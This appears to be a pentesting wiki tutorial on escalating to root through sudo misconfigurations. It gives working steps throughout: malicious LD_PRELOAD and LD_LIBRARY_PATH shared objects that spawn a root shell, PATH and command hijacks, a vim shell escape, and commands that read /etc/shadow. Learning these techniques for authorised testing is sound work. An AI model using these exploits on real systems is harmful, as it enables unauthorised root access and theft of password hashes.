# Sudo Misconfigurations

## Theory

On this page, we speak about specific SUDO misconfigurations that can be leveraged to subvert sudo's intended functionality and elevate our privileges.

## Practice

### NOPASSWD

{% tabs %}
{% tab title="Enumerate" %}
The following `sudo` configuration allow an user to execute some command with another user's privileges without knowing the password.

```bash
$ sudo -l

User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim
```

{% endtab %}

{% tab title="Exploit" %}
If you can run a binary with sudo rights, you may want to have look at [GTFOBins](https://gtfobins.github.io/), a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with `vim`, we can spawn a shell with following commands:

```bash
sudo -u root vim -c '!sh'
```

{% endtab %}
{% endtabs %}

### LD\_PRELOAD

{% tabs %}
{% tab title="Enumerate" %}
`LD_PRELOAD` is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

If `env_keep+=LD_PRELOAD` is explicitly defined in the `sudo -l` output and you can call some command with sudo, you can escalate your privileges.

```bash
$ sudo -l

env_reset, env_keep+=LD_PRELOAD
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find
```

{% endtab %}

{% tab title="Exploit" %}
To exploit, we can write a shared library

```c
//Saved as /tmp/privEsc.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
```

compile it

```bash
gcc -fPIC -shared -o something.so /tmp/privEsc.c -nostartfiles
```

Then run the sudo binary with `LD_PRELOAD` environement variable

```bash
#Use any command you can run with sudo
sudo LD_PRELOAD=./something.so <COMMAND>

#Example
sudo LD_PRELOAD=./something.so /usr/bin/find
```

{% endtab %}
{% endtabs %}

### LD\_LIBRARY\_PATH

{% tabs %}
{% tab title="Enumerate" %}
the `LD_LIBRARY_PATH` env variable controls the path where libraries are going to be searched.

If `env_keep+=LD_LIBRARY_PATH` is explicitly defined in the `sudo -l` output and you can call some command with sudo, you can escalate your privileges.

```bash
$ sudo -l

env_reset, env_keep+=LD_LIBRARY_PATH
User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/find
```

{% endtab %}

{% tab title="Exploit" %}
To abuse it we can do as follow

First, print the shared libraries of the sudo program. We will take `/usr/bin/find` as an example

```bash
$ ldd /usr/bin/find
        linux-vdso.so.1 (0x00007ffd627aa000)
        libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f6ebe9cc000)
        libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f6ebe8ed000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6ebe70c000)
        libpcre2-8.so.0 => /lib/x86_64-linux-gnu/libpcre2-8.so.0 (0x00007f6ebe672000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f6ebea5f000)
```

Use one of the shared objects in the list and we will hijack it by creating a file with same name. For this demonstration, we will be targeting the `libpcre2-8.so.0` file.

```c
//Saved as /tmp/libpcre2-8.so.0.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```

compile it

```bash
gcc -o /tmp/libpcre2-8.so.0 -shared -fPIC /tmp/libpcre2-8.so.0.c
```

Then run the sudo binary with `LD_LIBRARY_PATH` environement variable

```bash
#Use any command you can run with sudo
sudo LD_LIBRARY_PATH=/tmp <COMMAND>

#Example
sudo LD_LIBRARY_PATH=/tmp /usr/bin/find
```

{% endtab %}
{% endtabs %}

### SETENV

{% tabs %}
{% tab title="Enumerate" %}
This `SETENV`directive allows the user to **set an environment variable** while executing something:

```bash
#Setenv on an arbitrary binary/script 
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh


#Setenv on binary/script without the full command path
$ sudo -l

env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always
User waldo may run the following commands on admirer:
    (ALL) SETENV: find

```

{% endtab %}

{% tab title="Exploit" %}
The previous example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** to load an arbitrary python library while executing the script as root:

<pre class="language-bash"><code class="lang-bash"><strong>#Sudo with modified PYTHONPATH
</strong><strong>sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
</strong></code></pre>

Or, you can set the **PATH** env variable if you can sudo on a binary without the full command path specified.

```bash
#Create a malicious find executable
echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

#Sudo with modified PATH
sudo PATH=/tmp:$PATH find
```

{% endtab %}
{% endtabs %}

### Command Path Hijacking <a href="#command-path-hijacking" id="command-path-hijacking"></a>

{% tabs %}
{% tab title="Enumerate" %}
If we can execute some command as root but **`env_reset`** and **`secure_path`** are set, we cannot override the **PATH** environment variable.

Instead we need to check if we have permission to write each path if a the sudo binary is specified **without the full command path**.

```bash
$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root) python /home/user/example.py

```

{% endtab %}

{% tab title="Exploit" %}
We need to check if we have permission to write each path.

```bash
ls -al /usr/local/
ls -al /usr/
ls -al /
```

Assume we can write an arbitrary binary file under **`/usr/sbin`**, we can create a payload in there. For example, we create a **`python`** binary under **`/usr/sbin`**.

```bash
echo '/bin/bash -p' > /usr/sbin/python
chmod +x /usr/sbin/python
```

Then execute the sudo command.

```bash
sudo python /home/user/example.py
```

{% endtab %}
{% endtabs %}

### Bypassing paths - Wildcard & Symlink

{% tabs %}
{% tab title="Enumerate" %}
If we can execute some command as root and it contains a **wildcard**. We may use **symlinks**, **path traversal** or **multiple arguments** to exploit it.

```bash
$ sudo -l

env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User demo may run the following commands on crashlab:
    (root): /bin/less /var/log/*
```

{% endtab %}

{% tab title="Exploit" %}
We can exploit it by using path traversal technique

```bash
sudo less /var/log/../../etc/shadow
```

or we can exploit it by using symlinks technique

```bash
ln /etc/shadow /var/log/new
sudo less /var/log/new
```

Finally we can try to read 2 files at same time

```bash
sudo less /var/log/something /etc/shadow
```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md#sudo>" %}

{% embed url="<https://atom.hackstreetboys.ph/linux-privilege-escalation-environment-variables/>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/>" %}